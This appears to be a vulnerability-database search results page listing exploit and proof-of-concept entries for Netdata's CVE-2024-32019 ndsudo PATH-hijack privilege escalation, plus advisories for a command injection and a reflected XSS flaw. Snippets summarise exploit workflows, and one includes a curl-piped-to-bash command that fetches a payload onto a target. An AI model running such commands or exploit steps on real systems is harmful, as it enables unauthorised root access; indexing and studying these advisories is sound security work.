Lucene search
+L

188 matches found

Kitploit
Kitploit
added 2026/09/13 2:27 p.m.6 views

CVE-2024-32019-poc

CVE-2024-32019-poc Netdata ndsudo PoC Build the binary: root@kitploit: go build -ldflags "-s -w" -o nvme poc.go upx nvme Run the bash script: root@kitploit: bash exploit.sh In target machine run in a writable directory: root@kitploit: curl http://:8000/payload.sh | bash It will automatically...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/13 11:25 a.m.5 views

CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

🚨 CVE-2024-32019 - Netdata ndsudo PATH Vulnerability Exploit LPE to Root A Python-based exploit for CVE-2024-32019 , a high-severity Local Privilege Escalation vulnerability in the Netdata Agent , leveraging a misconfigured SUID binary ndsudo that fails to securely handle the PATH environment...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/13 10:54 a.m.8 views

CVE-2024-32019-POC

CVE-2024-32019-POC Netdata ndsudo local privilage escalation workflow and POC CVE-2024-32019 Workflow Automatic exploit Resources Workflow !TIP Please read Netdata is a tool that provides apps and systems monitoring, it runs at port 19999, easy to find: root@kitploit: test@test:$ netstat -tuln...

8.8CVSS8.1AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/13 9:19 a.m.8 views

CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

CVE-2024-32019 Netdata ndsudo Privilege Escalation PoC Summary CVE-2024-32019 is a local privilege-escalation flaw in Netdata’s SUID helper ndsudo that lets a local user execute arbitrary programs as root via an untrusted search path PATH hijacking. The issue exists because ndsudo restricts comma...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/12 6:38 a.m.7 views

CVE-2024-32019-PoC

CVE-2024-32019-PoC Script Bash para escalada de privilegios mediante "ndsudo" Exploit Local de Netdata Versiones afectadas de Netdata = v1.45.0, = v1.44.0-60, v1.45.0-169 Descripción de la vulnerabilidad La herramienta "ndsudo" ejecuta un conjunto restringido de comandos externos, pero las rutas ...

8.8CVSS7.8AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/10 11:23 a.m.5 views

CVE-2024-32019-ndsudo-local-privilege-escalation-NetData

CVE-2024-32019 Proof of Concept Python A Python implementation of the Local Privilege Escalation LPE exploit for Netdata CVE-2024-32019. This script exploits a vulnerability in the ndsudo component where the PATH environment variable is not properly sanitized. This allows a local attacker to...

8.8CVSS7.8AI score0.01165EPSS
SaveExploits15
Kitploit
Kitploit
added 2026/09/10 5:19 a.m.9 views

CVE-2024-32019-ndsudo

La vulnerabilidad ndsudo permite a un atacante obtener permisos de root explotando una ruta de búsqueda no confiable en la herramienta ndsudo, que forma parte del Netdata Agent. Esto puede permitir la ejecución de programas arbitrarios con privilegios elevados si el atacante coloca un binario...

8.8CVSS7.5AI score0.01165EPSS
SaveExploits15
Kitploit
Kitploit
added 2026/09/10 4:54 a.m.10 views

CVE-2024-32019_poc

Privilege Escalation via ndsudo Netdata Local Exploit This is an alternative POC to exploit a vulnerable ndsudo utility bundled with Netdata to perform a local privilege escalation. The exploit works by adding the script inside the user’s PATH substituting an allowed command nvme by ndsudo and...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/09 5:31 p.m.6 views

-Netdata-PrivEsc-CVE-2024-32019

CVE-2024-32019-Netdata-ndsudo-PrivEsc CVE-2024-32019: Netdata ndsudo PrivEsc HTB Editor Automated Bash script to exploit the PATH Hijacking vulnerability in Netdata's SUID ndsudo binary CVE-2024-32019. This exploit was specifically adapted to overcome common restrictions found in hardened...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15
Kitploit
Kitploit
added 2026/09/09 11:01 a.m.8 views

CVE-2023-22496-PoC

CVE-2023-22496 — Netdata Agent OS Command Injection PoC Severity : Critical CVSS 9.8 Affected : Netdata Agent Fixed in : v1.37.0 Type : OS Command Injection CWE-78 Overview CVE-2023-22496 is an OS command injection vulnerability in Netdata's health alarm notification system. The registryhostname ...

9.8CVSS7.9AI score0.36171EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/07 2:18 p.m.4 views

CVE-2024-32019-POC

⚠️ CVE-2024-32019 - PoC 📌 Affected Versions = v1.45.0, = v1.44.0-60, v1.45.0-169 🛠️ Proof of Concept CVE-2024-32019 — ndsudo local privilege escalation via untrusted search path. 🔧 Compile the Exploit root@kitploit: x8664-linux-gnu-gcc -o nvme exploit.c -static 📤 Deploy on Target Machine 1...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/07 12:39 p.m.5 views

CVE-2024-32019-POC

Privilege Escalation via ndsudo Netdata Local Exploit This POC is used to exploit a vulnerable ndsudo utility bundled with Netdata to escalate local privileges to root. The exploit works by injecting a malicious binary into the user’s PATH that impersonates a trusted command nvme and is executed...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/05 1:54 p.m.9 views

cve-2024-32019-PoC

CVE-2024-32019 — Netdata ndsudo 本地权限提升 摘要 Netdata 的 ndsudo 辅助程序(安装时为 setuid root)限制它可以运行的命令,但使用调用者的PATH 来解析这些命令。在受影响版本中,本地用户可以将恶意二进制文件放在 PATH 中更靠前的位置,并让 ndsudo 以 root 权限执行它。已在 Netdata 1.45.3 和 1.45.0-169 中修补。 受影响 / 已修补 受影响: = 1.44.0-60, = 1.45.0, 来打印解析后的命令而不实际执行 (请谨慎使用,先阅读代码)。GitHub ⚠️ 不包含武器化 PoC...

8.8CVSS7.8AI score0.01165EPSS
SaveExploits15References1
Tenable Nessus
Tenable Nessus
added 2026/07/04 12:00 a.m.15 views

Linux Distros Unpatched Vulnerability : CVE-2025-71385

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Netdata before 2.3.1 reflects the user-supplied love query parameter of the api/v2/ilove.svg and api/v3/ilove.svg endpoints verbatim into the generated SVG...

6.1CVSS5.4AI score0.0043EPSS
SaveExploits0References2
RedhatCVE
RedhatCVE
added 2026/07/03 6:40 a.m.18 views

CVE-2025-71385

A flaw was found in Netdata. A remote unauthenticated attacker could exploit a reflected Cross-Site Scripting XSS vulnerability in the api/v2/ilove.svg and api/v3/ilove.svg endpoints. By injecting malicious script into the love query parameter, an attacker could trick a victim into executing...

6.1CVSS6.2AI score0.0043EPSS
SaveExploits0References2
NVD
NVD
added 2026/07/02 8:17 p.m.21 views

CVE-2025-71385

Netdata before 2.3.1 reflects the user-supplied love query parameter of the api/v2/ilove.svg and api/v3/ilove.svg endpoints verbatim into the generated SVG document into a text element without HTML or XML escaping, and serves the response with Content-Type image/svg+xml. An attacker can craft a U...

6.1CVSS0.0043EPSS
SaveExploits0References4
OSV
OSV
added 2026/07/02 8:17 p.m.12 views

DEBIAN-CVE-2025-71385

Netdata before 2.3.1 reflects the user-supplied love query parameter of the api/v2/ilove.svg and api/v3/ilove.svg endpoints verbatim into the generated SVG document into a text element without HTML or XML escaping, and serves the response with Content-Type image/svg+xml. An attacker can craft a U...

6.1CVSS5.9AI score0.0043EPSS
SaveExploits0References1
OSV
OSV
added 2026/07/02 8:17 p.m.17 views

UBUNTU-CVE-2025-71385

Netdata before 2.3.1 reflects the user-supplied love query parameter of the api/v2/ilove.svg and api/v3/ilove.svg endpoints verbatim into the generated SVG document into a text element without HTML or XML escaping, and serves the response with Content-Type image/svg+xml. An attacker can craft a U...

6.1CVSS5.9AI score0.0043EPSS
SaveExploits0References6
Vulnrichment
Vulnrichment
added 2026/07/02 7:37 p.m.11 views

CVE-2025-71385 Netdata < 2.3.1 - Reflected Cross-Site Scripting via love Parameter in ilove.svg Endpoint

Netdata before 2.3.1 reflects the user-supplied love query parameter of the api/v2/ilove.svg and api/v3/ilove.svg endpoints verbatim into the generated SVG document into a text element without HTML or XML escaping, and serves the response with Content-Type image/svg+xml. An attacker can craft a U...

6.1CVSS5.9AI score0.0043EPSS
SaveExploits0References4
AlpineLinux
AlpineLinux
added 2026/07/02 7:37 p.m.15 views

CVE-2025-71385

Netdata before 2.3.1 reflects the user-supplied love query parameter of the api/v2/ilove.svg and api/v3/ilove.svg endpoints verbatim into the generated SVG document into a text element without HTML or XML escaping, and serves the response with Content-Type image/svg+xml. An attacker can craft a U...

6.1CVSS5.9AI score0.0043EPSS
SaveExploits0References4
Rows per page
Query Builder